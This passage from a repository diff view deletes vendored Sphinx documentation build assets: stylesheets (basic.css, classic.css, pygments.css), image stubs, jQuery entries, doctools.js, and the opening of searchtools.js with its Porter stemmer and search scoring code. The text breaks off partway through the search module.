width: 100%;
}
table.indextable td {
text-align: left;
vertical-align: top;
}
table.indextable dl, table.indextable dd {
margin-top: 0;
margin-bottom: 0;
}
table.indextable tr.pcap {
height: 10px;
}
table.indextable tr.cap {
margin-top: 10px;
background-color: #f2f2f2;
}
img.toggler {
margin-right: 3px;
margin-top: 3px;
cursor: pointer;
}
div.modindex-jumpbox {
border-top: 1px solid #ddd;
border-bottom: 1px solid #ddd;
margin: 1em 0 1em 0;
padding: 0.4em;
}
div.genindex-jumpbox {
border-top: 1px solid #ddd;
border-bottom: 1px solid #ddd;
margin: 1em 0 1em 0;
padding: 0.4em;
}
/* -- general body styles --------------------------------------------------- */
a.headerlink {
visibility: hidden;
}
h1:hover > a.headerlink,
h2:hover > a.headerlink,
h3:hover > a.headerlink,
h4:hover > a.headerlink,
h5:hover > a.headerlink,
h6:hover > a.headerlink,
dt:hover > a.headerlink,
caption:hover > a.headerlink,
p.caption:hover > a.headerlink,
div.code-block-caption:hover > a.headerlink {
visibility: visible;
}
div.body p.caption {
text-align: inherit;
}
div.body td {
text-align: left;
}
.field-list ul {
padding-left: 1em;
}
.first {
margin-top: 0 !important;
}
p.rubric {
margin-top: 30px;
font-weight: bold;
}
img.align-left, .figure.align-left, object.align-left {
clear: left;
float: left;
margin-right: 1em;
}
img.align-right, .figure.align-right, object.align-right {
clear: right;
float: right;
margin-left: 1em;
}
img.align-center, .figure.align-center, object.align-center {
display: block;
margin-left: auto;
margin-right: auto;
}
.align-left {
text-align: left;
}
.align-center {
text-align: center;
}
.align-right {
text-align: right;
}
/* -- sidebars -------------------------------------------------------------- */
div.sidebar {
margin: 0 0 0.5em 1em;
border: 1px solid #ddb;
padding: 7px 7px 0 7px;
background-color: #ffe;
width: 40%;
float: right;
}
p.sidebar-title {
font-weight: bold;
}
/* -- topics ---------------------------------------------------------------- */
div.topic {
border: 1px solid #ccc;
padding: 7px 7px 0 7px;
margin: 10px 0 10px 0;
}
p.topic-title {
font-size: 1.1em;
font-weight: bold;
margin-top: 10px;
}
/* -- admonitions ----------------------------------------------------------- */
div.admonition {
margin-top: 10px;
margin-bottom: 10px;
padding: 7px;
}
div.admonition dt {
font-weight: bold;
}
div.admonition dl {
margin-bottom: 0;
}
p.admonition-title {
margin: 0px 10px 5px 0px;
font-weight: bold;
}
div.body p.centered {
text-align: center;
margin-top: 25px;
}
/* -- tables ---------------------------------------------------------------- */
table.docutils {
border: 0;
border-collapse: collapse;
}
table caption span.caption-number {
font-style: italic;
}
table caption span.caption-text {
}
table.docutils td, table.docutils th {
padding: 1px 8px 1px 5px;
border-top: 0;
border-left: 0;
border-right: 0;
border-bottom: 1px solid #aaa;
}
table.field-list td, table.field-list th {
border: 0 !important;
}
table.footnote td, table.footnote th {
border: 0 !important;
}
th {
text-align: left;
padding-right: 5px;
}
table.citation {
border-left: solid 1px gray;
margin-left: 1px;
}
table.citation td {
border-bottom: none;
}
/* -- figures --------------------------------------------------------------- */
div.figure {
margin: 0.5em;
padding: 0.5em;
}
div.figure p.caption {
padding: 0.3em;
}
div.figure p.caption span.caption-number {
font-style: italic;
}
div.figure p.caption span.caption-text {
}
/* -- other body styles ----------------------------------------------------- */
ol.arabic {
list-style: decimal;
}
ol.loweralpha {
list-style: lower-alpha;
}
ol.upperalpha {
list-style: upper-alpha;
}
ol.lowerroman {
list-style: lower-roman;
}
ol.upperroman {
list-style: upper-roman;
}
dl {
margin-bottom: 15px;
}
dd p {
margin-top: 0px;
}
dd ul, dd table {
margin-bottom: 10px;
}
dd {
margin-top: 3px;
margin-bottom: 10px;
margin-left: 30px;
}
dt:target, .highlighted {
background-color: #fbe54e;
}
dl.glossary dt {
font-weight: bold;
font-size: 1.1em;
}
.field-list ul {
margin: 0;
padding-left: 1em;
}
.field-list p {
margin: 0;
}
.optional {
font-size: 1.3em;
}
.sig-paren {
font-size: larger;
}
.versionmodified {
font-style: italic;
}
.system-message {
background-color: #fda;
padding: 5px;
border: 3px solid red;
}
.footnote:target {
background-color: #ffa;
}
.line-block {
display: block;
margin-top: 1em;
margin-bottom: 1em;
}
.line-block .line-block {
margin-top: 0;
margin-bottom: 0;
margin-left: 1.5em;
}
.guilabel, .menuselection {
font-family: sans-serif;
}
.accelerator {
text-decoration: underline;
}
.classifier {
font-style: oblique;
}
abbr, acronym {
border-bottom: dotted 1px;
cursor: help;
}
/* -- code displays --------------------------------------------------------- */
pre {
overflow: auto;
overflow-y: hidden; /* fixes display issues on Chrome browsers */
}
td.linenos pre {
padding: 5px 0px;
border: 0;
background-color: transparent;
color: #aaa;
}
table.highlighttable {
margin-left: 0.5em;
}
table.highlighttable td {
padding: 0 0.5em 0 0.5em;
}
div.code-block-caption {
padding: 2px 5px;
font-size: small;
}
div.code-block-caption code {
background-color: transparent;
}
div.code-block-caption + div > div.highlight > pre {
margin-top: 0;
}
div.code-block-caption span.caption-number {
padding: 0.1em 0.3em;
font-style: italic;
}
div.code-block-caption span.caption-text {
}
div.literal-block-wrapper {
padding: 1em 1em 0;
}
div.literal-block-wrapper div.highlight {
margin: 0;
}
code.descname {
background-color: transparent;
font-weight: bold;
font-size: 1.2em;
}
code.descclassname {
background-color: transparent;
}
code.xref, a code {
background-color: transparent;
font-weight: bold;
}
h1 code, h2 code, h3 code, h4 code, h5 code, h6 code {
background-color: transparent;
}
.viewcode-link {
float: right;
}
.viewcode-back {
float: right;
font-family: sans-serif;
}
div.viewcode-block:target {
margin: -1px -10px;
padding: 0 10px;
}
/* -- math display ---------------------------------------------------------- */
img.math {
vertical-align: middle;
}
div.body div.math p {
text-align: center;
}
span.eqno {
float: right;
}
/* -- printout stylesheet --------------------------------------------------- */
@media print {
div.document,
div.documentwrapper,
div.bodywrapper {
margin: 0 !important;
width: 100%;
}
div.sphinxsidebar,
div.related,
div.footer,
#top-link {
display: none;
}
}

261
docs/build/html/_static/classic.css vendored
Unescape View File

@ -1,261 +0,0 @@
/*
* default.css_t
* ~~~~~~~~~~~~~
*
* Sphinx stylesheet -- default theme.
*
* :copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
* :license: BSD, see LICENSE for details.
*
*/
@import url("basic.css");
/* -- page layout ----------------------------------------------------------- */
body {
font-family: sans-serif;
font-size: 100%;
background-color: #11303d;
color: #000;
margin: 0;
padding: 0;
}
div.document {
background-color: #1c4e63;
}
div.documentwrapper {
float: left;
width: 100%;
}
div.bodywrapper {
margin: 0 0 0 230px;
}
div.body {
background-color: #ffffff;
color: #000000;
padding: 0 20px 30px 20px;
}
div.footer {
color: #ffffff;
width: 100%;
padding: 9px 0 9px 0;
text-align: center;
font-size: 75%;
}
div.footer a {
color: #ffffff;
text-decoration: underline;
}
div.related {
background-color: #133f52;
line-height: 30px;
color: #ffffff;
}
div.related a {
color: #ffffff;
}
div.sphinxsidebar {
}
div.sphinxsidebar h3 {
font-family: 'Trebuchet MS', sans-serif;
color: #ffffff;
font-size: 1.4em;
font-weight: normal;
margin: 0;
padding: 0;
}
div.sphinxsidebar h3 a {
color: #ffffff;
}
div.sphinxsidebar h4 {
font-family: 'Trebuchet MS', sans-serif;
color: #ffffff;
font-size: 1.3em;
font-weight: normal;
margin: 5px 0 0 0;
padding: 0;
}
div.sphinxsidebar p {
color: #ffffff;
}
div.sphinxsidebar p.topless {
margin: 5px 10px 10px 10px;
}
div.sphinxsidebar ul {
margin: 10px;
padding: 0;
color: #ffffff;
}
div.sphinxsidebar a {
color: #98dbcc;
}
div.sphinxsidebar input {
border: 1px solid #98dbcc;
font-family: sans-serif;
font-size: 1em;
}
/* -- hyperlink styles ------------------------------------------------------ */
a {
color: #355f7c;
text-decoration: none;
}
a:visited {
color: #355f7c;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
/* -- body styles ----------------------------------------------------------- */
div.body h1,
div.body h2,
div.body h3,
div.body h4,
div.body h5,
div.body h6 {
font-family: 'Trebuchet MS', sans-serif;
background-color: #f2f2f2;
font-weight: normal;
color: #20435c;
border-bottom: 1px solid #ccc;
margin: 20px -20px 10px -20px;
padding: 3px 0 3px 10px;
}
div.body h1 { margin-top: 0; font-size: 200%; }
div.body h2 { font-size: 160%; }
div.body h3 { font-size: 140%; }
div.body h4 { font-size: 120%; }
div.body h5 { font-size: 110%; }
div.body h6 { font-size: 100%; }
a.headerlink {
color: #c60f0f;
font-size: 0.8em;
padding: 0 4px 0 4px;
text-decoration: none;
}
a.headerlink:hover {
background-color: #c60f0f;
color: white;
}
div.body p, div.body dd, div.body li, div.body blockquote {
text-align: justify;
line-height: 130%;
}
div.admonition p.admonition-title + p {
display: inline;
}
div.admonition p {
margin-bottom: 5px;
}
div.admonition pre {
margin-bottom: 5px;
}
div.admonition ul, div.admonition ol {
margin-bottom: 5px;
}
div.note {
background-color: #eee;
border: 1px solid #ccc;
}
div.seealso {
background-color: #ffc;
border: 1px solid #ff6;
}
div.topic {
background-color: #eee;
}
div.warning {
background-color: #ffe4e4;
border: 1px solid #f66;
}
p.admonition-title {
display: inline;
}
p.admonition-title:after {
content: ":";
}
pre {
padding: 5px;
background-color: #eeffcc;
color: #333333;
line-height: 120%;
border: 1px solid #ac9;
border-left: none;
border-right: none;
}
code {
background-color: #ecf0f3;
padding: 0 1px 0 1px;
font-size: 0.95em;
}
th {
background-color: #ede;
}
.warning code {
background: #efc2c2;
}
.note code {
background: #d6d6d6;
}
.viewcode-back {
font-family: sans-serif;
}
div.viewcode-block:target {
background-color: #f4debf;
border-top: 1px solid #ac9;
border-bottom: 1px solid #ac9;
}
div.code-block-caption {
color: #efefef;
background-color: #1c4e63;
}

BIN
docs/build/html/_static/comment-bright.png vendored
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 3.4 KiB

BIN
docs/build/html/_static/comment-close.png vendored
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 3.5 KiB

BIN
docs/build/html/_static/comment.png vendored
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 3.4 KiB

287
docs/build/html/_static/doctools.js vendored
Unescape View File

@ -1,287 +0,0 @@
/*
* doctools.js
* ~~~~~~~~~~~
*
* Sphinx JavaScript utilities for all documentation.
*
* :copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
* :license: BSD, see LICENSE for details.
*
*/
/**
* select a different prefix for underscore
*/
$u = _.noConflict();
/**
* make the code below compatible with browsers without
* an installed firebug like debugger
if (!window.console || !console.firebug) {
var names = ["log", "debug", "info", "warn", "error", "assert", "dir",
"dirxml", "group", "groupEnd", "time", "timeEnd", "count", "trace",
"profile", "profileEnd"];
window.console = {};
for (var i = 0; i < names.length; ++i)
window.console[names[i]] = function() {};
}
*/
/**
* small helper function to urldecode strings
*/
jQuery.urldecode = function(x) {
return decodeURIComponent(x).replace(/\+/g, ' ');
};
/**
* small helper function to urlencode strings
*/
jQuery.urlencode = encodeURIComponent;
/**
* This function returns the parsed url parameters of the
* current request. Multiple values per key are supported,
* it will always return arrays of strings for the value parts.
*/
jQuery.getQueryParameters = function(s) {
if (typeof s == 'undefined')
s = document.location.search;
var parts = s.substr(s.indexOf('?') + 1).split('&');
var result = {};
for (var i = 0; i < parts.length; i++) {
var tmp = parts[i].split('=', 2);
var key = jQuery.urldecode(tmp[0]);
var value = jQuery.urldecode(tmp[1]);
if (key in result)
result[key].push(value);
else
result[key] = [value];
}
return result;
};
/**
* highlight a given string on a jquery object by wrapping it in
* span elements with the given class name.
*/
jQuery.fn.highlightText = function(text, className) {
function highlight(node) {
if (node.nodeType == 3) {
var val = node.nodeValue;
var pos = val.toLowerCase().indexOf(text);
if (pos >= 0 && !jQuery(node.parentNode).hasClass(className)) {
var span = document.createElement("span");
span.className = className;
span.appendChild(document.createTextNode(val.substr(pos, text.length)));
node.parentNode.insertBefore(span, node.parentNode.insertBefore(
document.createTextNode(val.substr(pos + text.length)),
node.nextSibling));
node.nodeValue = val.substr(0, pos);
}
}
else if (!jQuery(node).is("button, select, textarea")) {
jQuery.each(node.childNodes, function() {
highlight(this);
});
}
}
return this.each(function() {
highlight(this);
});
};
/*
* backward compatibility for jQuery.browser
* This will be supported until firefox bug is fixed.
*/
if (!jQuery.browser) {
jQuery.uaMatch = function(ua) {
ua = ua.toLowerCase();
var match = /(chrome)[ \/]([\w.]+)/.exec(ua) ||
/(webkit)[ \/]([\w.]+)/.exec(ua) ||
/(opera)(?:.*version|)[ \/]([\w.]+)/.exec(ua) ||
/(msie) ([\w.]+)/.exec(ua) ||
ua.indexOf("compatible") < 0 && /(mozilla)(?:.*? rv:([\w.]+)|)/.exec(ua) ||
[];
return {
browser: match[ 1 ] || "",
version: match[ 2 ] || "0"
};
};
jQuery.browser = {};
jQuery.browser[jQuery.uaMatch(navigator.userAgent).browser] = true;
}
/**
* Small JavaScript module for the documentation.
*/
var Documentation = {
init : function() {
this.fixFirefoxAnchorBug();
this.highlightSearchWords();
this.initIndexTable();
},
/**
* i18n support
*/
TRANSLATIONS : {},
PLURAL_EXPR : function(n) { return n == 1 ? 0 : 1; },
LOCALE : 'unknown',
// gettext and ngettext don't access this so that the functions
// can safely bound to a different name (_ = Documentation.gettext)
gettext : function(string) {
var translated = Documentation.TRANSLATIONS[string];
if (typeof translated == 'undefined')
return string;
return (typeof translated == 'string') ? translated : translated[0];
},
ngettext : function(singular, plural, n) {
var translated = Documentation.TRANSLATIONS[singular];
if (typeof translated == 'undefined')
return (n == 1) ? singular : plural;
return translated[Documentation.PLURALEXPR(n)];
},
addTranslations : function(catalog) {
for (var key in catalog.messages)
this.TRANSLATIONS[key] = catalog.messages[key];
this.PLURAL_EXPR = new Function('n', 'return +(' + catalog.plural_expr + ')');
this.LOCALE = catalog.locale;
},
/**
* add context elements like header anchor links
*/
addContextElements : function() {
$('div[id] > :header:first').each(function() {
$('<a class="headerlink">\u00B6</a>').
attr('href', '#' + this.id).
attr('title', _('Permalink to this headline')).
appendTo(this);
});
$('dt[id]').each(function() {
$('<a class="headerlink">\u00B6</a>').
attr('href', '#' + this.id).
attr('title', _('Permalink to this definition')).
appendTo(this);
});
},
/**
* workaround a firefox stupidity
* see: https://bugzilla.mozilla.org/show_bug.cgi?id=645075
*/
fixFirefoxAnchorBug : function() {
if (document.location.hash)
window.setTimeout(function() {
document.location.href += '';
}, 10);
},
/**
* highlight the search words provided in the url in the text
*/
highlightSearchWords : function() {
var params = $.getQueryParameters();
var terms = (params.highlight) ? params.highlight[0].split(/\s+/) : [];
if (terms.length) {
var body = $('div.body');
if (!body.length) {
body = $('body');
}
window.setTimeout(function() {
$.each(terms, function() {
body.highlightText(this.toLowerCase(), 'highlighted');
});
}, 10);
$('<p class="highlight-link"><a href="javascript:Documentation.' +
'hideSearchWords()">' + _('Hide Search Matches') + '</a></p>')
.appendTo($('#searchbox'));
}
},
/**
* init the domain index toggle buttons
*/
initIndexTable : function() {
var togglers = $('img.toggler').click(function() {
var src = $(this).attr('src');
var idnum = $(this).attr('id').substr(7);
$('tr.cg-' + idnum).toggle();
if (src.substr(-9) == 'minus.png')
$(this).attr('src', src.substr(0, src.length-9) + 'plus.png');
else
$(this).attr('src', src.substr(0, src.length-8) + 'minus.png');
}).css('display', '');
if (DOCUMENTATION_OPTIONS.COLLAPSE_INDEX) {
togglers.click();
}
},
/**
* helper function to hide the search marks again
*/
hideSearchWords : function() {
$('#searchbox .highlight-link').fadeOut(300);
$('span.highlighted').removeClass('highlighted');
},
/**
* make the url absolute
*/
makeURL : function(relativeURL) {
return DOCUMENTATION_OPTIONS.URL_ROOT + '/' + relativeURL;
},
/**
* get the current relative url
*/
getCurrentURL : function() {
var path = document.location.pathname;
var parts = path.split(/\//);
$.each(DOCUMENTATION_OPTIONS.URL_ROOT.split(/\//), function() {
if (this == '..')
parts.pop();
});
var url = parts.join('/');
return path.substring(url.lastIndexOf('/') + 1, path.length - 1);
},
initOnKeyListeners: function() {
$(document).keyup(function(event) {
var activeElementType = document.activeElement.tagName;
// don't navigate when in search box or textarea
if (activeElementType !== 'TEXTAREA' && activeElementType !== 'INPUT' && activeElementType !== 'SELECT') {
switch (event.keyCode) {
case 37: // left
var prevHref = $('link[rel="prev"]').prop('href');
if (prevHref) {
window.location.href = prevHref;
return false;
}
case 39: // right
var nextHref = $('link[rel="next"]').prop('href');
if (nextHref) {
window.location.href = nextHref;
return false;
}
}
}
});
}
};
// quick alias for translations
_ = Documentation.gettext;
$(document).ready(function() {
Documentation.init();
});

BIN
docs/build/html/_static/down-pressed.png vendored
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 347 B

BIN
docs/build/html/_static/down.png vendored
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 347 B

BIN
docs/build/html/_static/file.png vendored
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 358 B

10308
docs/build/html/_static/jquery-1.11.1.js vendored
View File

File diff suppressed because it is too large Load Diff

4
docs/build/html/_static/jquery.js vendored
View File

File diff suppressed because one or more lines are too long

BIN
docs/build/html/_static/minus.png vendored
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 173 B

BIN
docs/build/html/_static/plus.png vendored
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 173 B

65
docs/build/html/_static/pygments.css vendored
Unescape View File

@ -1,65 +0,0 @@
.highlight .hll { background-color: #ffffcc }
.highlight { background: #eeffcc; }
.highlight .c { color: #408090; font-style: italic } /* Comment */
.highlight .err { border: 1px solid #FF0000 } /* Error */
.highlight .k { color: #007020; font-weight: bold } /* Keyword */
.highlight .o { color: #666666 } /* Operator */
.highlight .ch { color: #408090; font-style: italic } /* Comment.Hashbang */
.highlight .cm { color: #408090; font-style: italic } /* Comment.Multiline */
.highlight .cp { color: #007020 } /* Comment.Preproc */
.highlight .cpf { color: #408090; font-style: italic } /* Comment.PreprocFile */
.highlight .c1 { color: #408090; font-style: italic } /* Comment.Single */
.highlight .cs { color: #408090; background-color: #fff0f0 } /* Comment.Special */
.highlight .gd { color: #A00000 } /* Generic.Deleted */
.highlight .ge { font-style: italic } /* Generic.Emph */
.highlight .gr { color: #FF0000 } /* Generic.Error */
.highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */
.highlight .gi { color: #00A000 } /* Generic.Inserted */
.highlight .go { color: #333333 } /* Generic.Output */
.highlight .gp { color: #c65d09; font-weight: bold } /* Generic.Prompt */
.highlight .gs { font-weight: bold } /* Generic.Strong */
.highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */
.highlight .gt { color: #0044DD } /* Generic.Traceback */
.highlight .kc { color: #007020; font-weight: bold } /* Keyword.Constant */
.highlight .kd { color: #007020; font-weight: bold } /* Keyword.Declaration */
.highlight .kn { color: #007020; font-weight: bold } /* Keyword.Namespace */
.highlight .kp { color: #007020 } /* Keyword.Pseudo */
.highlight .kr { color: #007020; font-weight: bold } /* Keyword.Reserved */
.highlight .kt { color: #902000 } /* Keyword.Type */
.highlight .m { color: #208050 } /* Literal.Number */
.highlight .s { color: #4070a0 } /* Literal.String */
.highlight .na { color: #4070a0 } /* Name.Attribute */
.highlight .nb { color: #007020 } /* Name.Builtin */
.highlight .nc { color: #0e84b5; font-weight: bold } /* Name.Class */
.highlight .no { color: #60add5 } /* Name.Constant */
.highlight .nd { color: #555555; font-weight: bold } /* Name.Decorator */
.highlight .ni { color: #d55537; font-weight: bold } /* Name.Entity */
.highlight .ne { color: #007020 } /* Name.Exception */
.highlight .nf { color: #06287e } /* Name.Function */
.highlight .nl { color: #002070; font-weight: bold } /* Name.Label */
.highlight .nn { color: #0e84b5; font-weight: bold } /* Name.Namespace */
.highlight .nt { color: #062873; font-weight: bold } /* Name.Tag */
.highlight .nv { color: #bb60d5 } /* Name.Variable */
.highlight .ow { color: #007020; font-weight: bold } /* Operator.Word */
.highlight .w { color: #bbbbbb } /* Text.Whitespace */
.highlight .mb { color: #208050 } /* Literal.Number.Bin */
.highlight .mf { color: #208050 } /* Literal.Number.Float */
.highlight .mh { color: #208050 } /* Literal.Number.Hex */
.highlight .mi { color: #208050 } /* Literal.Number.Integer */
.highlight .mo { color: #208050 } /* Literal.Number.Oct */
.highlight .sb { color: #4070a0 } /* Literal.String.Backtick */
.highlight .sc { color: #4070a0 } /* Literal.String.Char */
.highlight .sd { color: #4070a0; font-style: italic } /* Literal.String.Doc */
.highlight .s2 { color: #4070a0 } /* Literal.String.Double */
.highlight .se { color: #4070a0; font-weight: bold } /* Literal.String.Escape */
.highlight .sh { color: #4070a0 } /* Literal.String.Heredoc */
.highlight .si { color: #70a0d0; font-style: italic } /* Literal.String.Interpol */
.highlight .sx { color: #c65d09 } /* Literal.String.Other */
.highlight .sr { color: #235388 } /* Literal.String.Regex */
.highlight .s1 { color: #4070a0 } /* Literal.String.Single */
.highlight .ss { color: #517918 } /* Literal.String.Symbol */
.highlight .bp { color: #007020 } /* Name.Builtin.Pseudo */
.highlight .vc { color: #bb60d5 } /* Name.Variable.Class */
.highlight .vg { color: #bb60d5 } /* Name.Variable.Global */
.highlight .vi { color: #bb60d5 } /* Name.Variable.Instance */
.highlight .il { color: #208050 } /* Literal.Number.Integer.Long */

651
docs/build/html/_static/searchtools.js vendored
Unescape View File

@ -1,651 +0,0 @@
/*
* searchtools.js_t
* ~~~~~~~~~~~~~~~~
*
* Sphinx JavaScript utilties for the full-text search.
*
* :copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
* :license: BSD, see LICENSE for details.
*
*/
/* Non-minified version JS is _stemmer.js if file is provided */
/**
* Porter Stemmer
*/
var Stemmer = function() {
var step2list = {
ational: 'ate',
tional: 'tion',
enci: 'ence',
anci: 'ance',
izer: 'ize',
bli: 'ble',
alli: 'al',
entli: 'ent',
eli: 'e',
ousli: 'ous',
ization: 'ize',
ation: 'ate',
ator: 'ate',
alism: 'al',
iveness: 'ive',
fulness: 'ful',
ousness: 'ous',
aliti: 'al',
iviti: 'ive',
biliti: 'ble',
logi: 'log'
};
var step3list = {
icate: 'ic',
ative: '',
alize: 'al',
iciti: 'ic',
ical: 'ic',
ful: '',
ness: ''
};
var c = "[^aeiou]"; // consonant
var v = "[aeiouy]"; // vowel
var C = c + "[^aeiouy]*"; // consonant sequence
var V = v + "[aeiou]*"; // vowel sequence
var mgr0 = "^(" + C + ")?" + V + C; // [C]VC... is m>0
var meq1 = "^(" + C + ")?" + V + C + "(" + V + ")?$"; // [C]VC[V] is m=1
var mgr1 = "^(" + C + ")?" + V + C + V + C; // [C]VCVC... is m>1
var s_v = "^(" + C + ")?" + v; // vowel in stem
this.stemWord = function (w) {
var stem;
var suffix;
var firstch;
var origword = w;
if (w.length < 3)
return w;
var re;
var re2;
var re3;
var re4;
firstch = w.substr(0,1);
if (firstch == "y")
w = firstch.toUpperCase() + w.substr(1);
// Step 1a
re = /^(.+?)(ss|i)es$/;
re2 = /^(.+?)([^s])s$/;
if (re.test(w))
w = w.replace(re,"$1$2");
else if (re2.test(w))
w = w.replace(re2,"$1$2");
// Step 1b
re = /^(.+?)eed$/;
re2 = /^(.+?)(ed|ing)$/;
if (re.test(w)) {
var fp = re.exec(w);
re = new RegExp(mgr0);
if (re.test(fp[1])) {
re = /.$/;
w = w.replace(re,"");
}
}
else if (re2.test(w)) {
var fp = re2.exec(w);
stem = fp[1];
re2 = new RegExp(s_v);
if (re2.test(stem)) {
w = stem;
re2 = /(at|bl|iz)$/;
re3 = new RegExp("([^aeiouylsz])\\1$");
re4 = new RegExp("^" + C + v + "[^aeiouwxy]$");
if (re2.test(w))
w = w + "e";
else if (re3.test(w)) {
re = /.$/;
w = w.replace(re,"");
}
else if (re4.test(w))
w = w + "e";
}
}
// Step 1c
re = /^(.+?)y$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
re = new RegExp(s_v);
if (re.test(stem))
w = stem + "i";
}
// Step 2
re = /^(.+?)(ational|tional|enci|anci|izer|bli|alli|entli|eli|ousli|ization|ation|ator|alism|iveness|fulness|ousness|aliti|iviti|biliti|logi)$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
suffix = fp[2];
re = new RegExp(mgr0);
if (re.test(stem))
w = stem + step2list[suffix];
}
// Step 3
re = /^(.+?)(icate|ative|alize|iciti|ical|ful|ness)$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
suffix = fp[2];
re = new RegExp(mgr0);
if (re.test(stem))
w = stem + step3list[suffix];
}
// Step 4
re = /^(.+?)(al|ance|ence|er|ic|able|ible|ant|ement|ment|ent|ou|ism|ate|iti|ous|ive|ize)$/;
re2 = /^(.+?)(s|t)(ion)$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
re = new RegExp(mgr1);
if (re.test(stem))
w = stem;
}
else if (re2.test(w)) {
var fp = re2.exec(w);
stem = fp[1] + fp[2];
re2 = new RegExp(mgr1);
if (re2.test(stem))
w = stem;
}
// Step 5
re = /^(.+?)e$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
re = new RegExp(mgr1);
re2 = new RegExp(meq1);
re3 = new RegExp("^" + C + v + "[^aeiouwxy]$");
if (re.test(stem) || (re2.test(stem) && !(re3.test(stem))))
w = stem;
}
re = /ll$/;
re2 = new RegExp(mgr1);
if (re.test(w) && re2.test(w)) {
re = /.$/;
w = w.replace(re,"");
}
// and turn initial Y back to y
if (firstch == "y")
w = firstch.toLowerCase() + w.substr(1);
return w;
}
}
/**
* Simple result scoring code.
*/
var Scorer = {
// Implement the following function to further tweak the score for each result
// The function takes a result array [filename, title, anchor, descr, score]
// and returns the new score.
/*
score: function(result) {
return result[4];
},
*/
// query matches the full name of an object
objNameMatch: 11,
// or matches in the last dotted part of the object name
objPartialMatch: 6,
// Additive scores depending on the priority of the object
objPrio: {0: 15, // used to be importantResults
1: 5, // used to be objectResults
2: -5}, // used to be unimportantResults
// Used when the priority is not in the mapping.
objPrioDefault: 0,
// query found in title
title: 15,
// query found in terms
term: 5
};
/**
* Search Module
*/
var Search = {
_index : null,
_queued_query : null,
_pulse_status : -1,
init : function() {
var params = $.getQueryParameters();
if (params.q) {
var query = params.q[0];
$('input[name="q"]')[0].value = query;
this.performSearch(query);
}
},
loadIndex : function(url) {
$.ajax({type: "GET", url: url, data: null,
dataType: "script", cache: true,
complete: function(jqxhr, textstatus) {
if (textstatus != "success") {
document.getElementById("searchindexloader").src = url;
}
}});
},
setIndex : function(index) {
var q;
this._index = index;
if ((q = this._queued_query) !== null) {
this._queued_query = null;
Search.query(q);
}
},
hasIndex : function() {
return this._index !== null;
},
deferQuery : function(query) {
this._queued_query = query;
},
stopPulse : function() {
this._pulse_status = 0;
},
startPulse : function() {
if (this._pulse_status >= 0)
return;
function pulse() {
var i;
Search._pulse_status = (Search._pulse_status + 1) % 4;
var dotString = '';
for (i = 0; i < Search._pulse_status; i++)
dotString += '.';
Search.dots.text(dotString);
if (Search._pulse_status > -1)
window.setTimeout(pulse, 500);
}
pulse();
},
/**
* perform a search for something (or wait until index is loaded)
*/
performSearch : function(query) {
// create the required interface elements
this.out = $('#search-results');
this.title = $('<h2>' + _('Searching') + '</h2>').appendTo(this.out);
this.dots = $('<span></span>').appendTo(this.title);
this.status = $('<p style="display: none"></p>').appendTo(this.out);
this.output = $('<ul class="search"/>').appendTo(this.out);
$('#search-progress').text(_('Preparing search...'));
this.startPulse();
// index already loaded, the browser was quick!
if (this.hasIndex())
this.query(query);
else
this.deferQuery(query);
},
/**
* execute search (requires search index to be loaded)
*/
query : function(query) {
var i;
var stopwords = ["a","and","are","as","at","be","but","by","for","if","in","into","is","it","near","no","not","of","on","or","such","that","the","their","then","there","these","they","this","to","was","will","with"];
// stem the searchterms and add them to the correct list
var stemmer = new Stemmer();
var searchterms = [];
var excluded = [];
var hlterms = [];
var tmp = query.split(/\s+/);
var objectterms = [];
for (i = 0; i < tmp.length; i++) {
if (tmp[i] !== "") {
objectterms.push(tmp[i].toLowerCase());
}
if ($u.indexOf(stopwords, tmp[i].toLowerCase()) != -1 || tmp[i].match(/^\d+$/) ||
tmp[i] === "") {
// skip this "word"
continue;
}
// stem the word
var word = stemmer.stemWord(tmp[i].toLowerCase());
var toAppend;
// select the correct list
if (word[0] == '-') {
toAppend = excluded;
word = word.substr(1);
}
else {
toAppend = searchterms;
hlterms.push(tmp[i].toLowerCase());
}
// only add if not already in the list
if (!$u.contains(toAppend, word))
toAppend.push(word);
}
var highlightstring = '?highlight=' + $.urlencode(hlterms.join(" "));
// console.debug('SEARCH: searching for:');
// console.info('required: ', searchterms);
// console.info('excluded: ', excluded);
// prepare search
var terms = this._index.terms;
var titleterms = this._index.titleterms;
// array of [filename, title, anchor, descr, score]
var results = [];
$('#search-progress').empty();
// lookup as object
for (i = 0; i < objectterms.length; i++) {
var others = [].concat(objectterms.slice(0, i),
objectterms.slice(i+1, objectterms.length));
results = results.concat(this.performObjectSearch(objectterms[i], others));
}
// lookup as search terms in fulltext
results = results.concat(this.performTermsSearch(searchterms, excluded, terms, titleterms));
// let the scorer override scores with a custom scoring function
if (Scorer.score) {
for (i = 0; i < results.length; i++)
results[i][4] = Scorer.score(results[i]);
}
// now sort the results by score (in opposite order of appearance, since the
// display function below uses pop() to retrieve items) and then
// alphabetically
results.sort(function(a, b) {
var left = a[4];
var right = b[4];
if (left > right) {
return 1;
} else if (left < right) {
return -1;
} else {
// same score: sort alphabetically
left = a[1].toLowerCase();
right = b[1].toLowerCase();
return (left > right) ? -1 : ((left < right) ? 1 : 0);
}
});
// for debugging
//Search.lastresults = results.slice(); // a copy
//console.info('search results:', Search.lastresults);
// print the results
var resultCount = results.length;
function displayNextItem() {
// results left, load the summary and display it
if (results.length) {
var item = results.pop();
var listItem = $('<li style="display:none"></li>');
